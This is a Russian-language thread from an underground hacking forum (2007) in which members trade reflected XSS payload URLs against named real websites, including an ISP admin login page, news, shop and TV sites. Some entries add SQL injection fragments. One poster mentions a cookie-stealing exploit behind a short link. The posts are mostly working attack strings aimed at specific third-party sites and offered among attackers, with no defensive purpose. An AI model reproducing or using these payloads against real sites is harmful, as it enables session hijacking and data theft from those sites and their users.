Вернуться   GraBBerZ.CoM - ICQ | Proxy | Бруты | Дедики | Эксплоиты > Underground > ][ack

Ответ
 
Опции темы Опции просмотра

Старый 22.07.2007, 16:45   #16
Гость
 
Аватар для Loki
 
Сообщений: n/a
Сайт http://vkontakte.ru/login.php
Вот его уязвимость:<input class="inputText" type="text" name="email" value="stupid_lamer@mail.ru" id="email" size="25" />

Как я понял благодаря этой строчке возможна XSS атака!Нужно закрыть сам тег input я так понял что это делается вот так "> далее<h1>stupid_lamer.Надеюсь правильно?
Я только не пойму как мне все это залить на страницу?
  Ответить с цитированием

Старый 30.08.2007, 18:25   #17
Гость
 
Аватар для Dreel
 
Сообщений: n/a
Вот нашел уязвимости:
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 сообщение(ий)):
У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

P.S. Скажите пожалуйста тег для вставки кода
  Ответить с цитированием

Старый 10.09.2007, 21:30   #18
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
http://realadvert.com.ua/whatadd.php?what=<a href="GraBBerZ.com"><font size=7>GraBBerZ</a>
Спешинал фор ГраББерЗ.ком
__________________
  Ответить с цитированием

Старый 12.09.2007, 02:56   #19
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
вот еще
Цитата:
_http://www.internetmap.info/cgi-bin/go.cgi?site_id="><img%20src=javascript:alert(/grabberz.com/)>
__________________
  Ответить с цитированием

Старый 12.09.2007, 22:20   #20
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
сначала сюда
потом дописать
Цитата:
"><img%20src=javascript:alert(/grabberz.com/)>
ЗЫ Опера, без кеша картинок.
__________________
  Ответить с цитированием

Старый 16.09.2007, 16:46   #21
Гость
 
Аватар для Dreel
 
Сообщений: n/a
Вот приличный вариант...
Цитата:
http://www.tnt-tv.ru/video/?text="><script>alert(/+Dreel+/)</script>
www.ren-tv.com > в поиске "><script>alert(/ Dreel /)</script>
http://poisk.ru/cgi-bin/poisk?text="><script>alert(/+xss+/);</script>
http://www.chaif.ru/new/uzel/novosti/2007/5000368"><script>alert(/ Dreel /)</script>
  Ответить с цитированием

Старый 17.09.2007, 19:11   #22
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Цитата:
http://forumline.kiev.ua/game/?search="><img+src=http://grabberz.com/disturbed/logo/lg1.jpg+onload=alert(/Specional_for_GraBBerz_by_flem_and_b3/)>
__________________
  Ответить с цитированием

Старый 23.09.2007, 12:31   #23
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Опера:
Цитата:
_http://www.meteoprog.com.ua/table.php?cityid=%3E%22%3E%3CScRiPt%20%0a%0d%3Eale rt(/whot'up?/)%3B%3C/ScRiPt%3E
Цитата:
_http://www.izum-city.com/index.php?searchword=%3E%22%3E%3CScRiPt%20%0a%0d%3 Ealert(/b3/)%3B%3C/ScRiPt%3E&option=com_search&Itemid=1+union+select+ 1,2,3,4,5,6,7+from+users/*
Цитата:
_http://www.4kg.ru/index.php?id=1082&action=search&txt=%3E%22%3E%3CSc RiPt%20%0a%0d%3Ealert(/b333/)%3B%3C/ScRiPt%3E
Цитата:
_http://www.webkatalog.kiev.ua/section.php?kat=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealer t(/b333/)%3B%3C/ScRiPt%3E
__________________
  Ответить с цитированием

Старый 30.09.2007, 02:22   #24
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Опера:

_http://www.iline-shop.ru/?rsd=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(/123/)%3B%3C/ScRiPt%3E
_http://www.agrocosm.com.ua/index.php?p=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(/1/)%3B%3C/ScRiPt%3E
_http://www.dsnick.fi/index.php?p=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(/1/)%3B%3C/ScRiPt%3E
_http://fgrcf.free.fr/index.php?p=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(/1/)%3B%3C/ScRiPt%3E
_http://www.gminternationalsrl.com/index.php?p=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(/1/)%3B%3C/ScRiPt%3E
_http://www.nvp-bus.de/index.php?p=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(/1/)%3B%3C/ScRiPt%3E
__________________
  Ответить с цитированием

Старый 30.09.2007, 05:51   #25
byte
 
Аватар для MoLoToK
 
MoLoToK вне форума
Регистрация: 18.01.2007
Адрес: NiTRaLKa
Сообщений: 90
Респекты: 8
Код:
http://diary.ru/list/?sort=&ord=&show=&fgroup_id=&username=&comm"><script>alert("XSS")</script>
MSN slate
Код:
http://www.slate.com/id/2174677/?GT1="><script>alert()</script>
  Ответить с цитированием

Старый 30.09.2007, 21:29   #26
bit
 
Аватар для Helkern
 
Helkern вне форума
Регистрация: 28.12.2006
Сообщений: 31
Респекты: 34
Farlep.UA - каждый укр должен знать его в лицо =)
Крупнейший провайдер инета и телефона в Украине.

Код:
http://www.farlep.ua/admin/login.php?back_url="><script>alert()</script>
Также есть в поиске...сплоит не даю-у каждого свои цели)

---

MalHost.org - хостинг (довольно таки известный):

Код:
http://malhost.org/mwhois/mwhois.php?domain=<script>alert()</script>
сплоит для получения кукисов:

Код:
http://pagi.ru/55f47f
кукисы булочные...шелл не дам =)
  Ответить с цитированием

Старый 01.10.2007, 05:24   #27
byte
 
Аватар для MoLoToK
 
MoLoToK вне форума
Регистрация: 18.01.2007
Адрес: NiTRaLKa
Сообщений: 90
Респекты: 8
Оп случайно нашёл
Код:
http://knigi.iskal.ru/istorija/scarlet.html?p=24"><script>alert()</script>
Поддомен спорт экспресс
Код:
http://extreme.sport-express.ru/search?text=%3Cscript%3Ealert%28%29%3C%2Fscript%3E&x=9&y="><script>alert()</script>
  Ответить с цитированием

Старый 01.10.2007, 10:14   #28
bit
 
Аватар для Helkern
 
Helkern вне форума
Регистрация: 28.12.2006
Сообщений: 31
Респекты: 34
b3,
хмм видать время ссылки прошло.
перезалил:

Код:
http://pagi.ru/c81318/
  Ответить с цитированием

Старый 01.10.2007, 15:05   #29
advanced lamer
 
Аватар для b3
 
b3 вне форума
Регистрация: 01.01.1970
Адрес: UA21
Сообщений: 2,244
Респекты: 2,259
Helkern,
вот таже хрень, что хочеш то и добавляеш
xss.js
__________________
  Ответить с цитированием

Старый 02.10.2007, 16:33   #30
Гость
 
Аватар для Dreel
 
Сообщений: n/a
Уфф... я уж испугался, что тут злущие админы, а оказывается хайд полетел и удалилась моя любимая XSSка вместе с репой ((
Код:
http://www.dom2.ru/%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%20%42%75%7A%6F%76%61%20%79%61%20%74%65%62%79%61%20%76%79%65%62%75%21%20%2F%29%3C%2F%73%63%72%69%70%74%3E

// повторяемся кажеться уже где-то было b3

Ничё непонимаю, вроде удалял оттуда, щас стопудова удалил, она нуждается в отдельности ))
  Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход



Время: 07:31



Powered by vBulletin® Version 3.7.6
Copyright ©2000 - 2017, Jelsoft Enterprises Ltd. Перевод: zCarot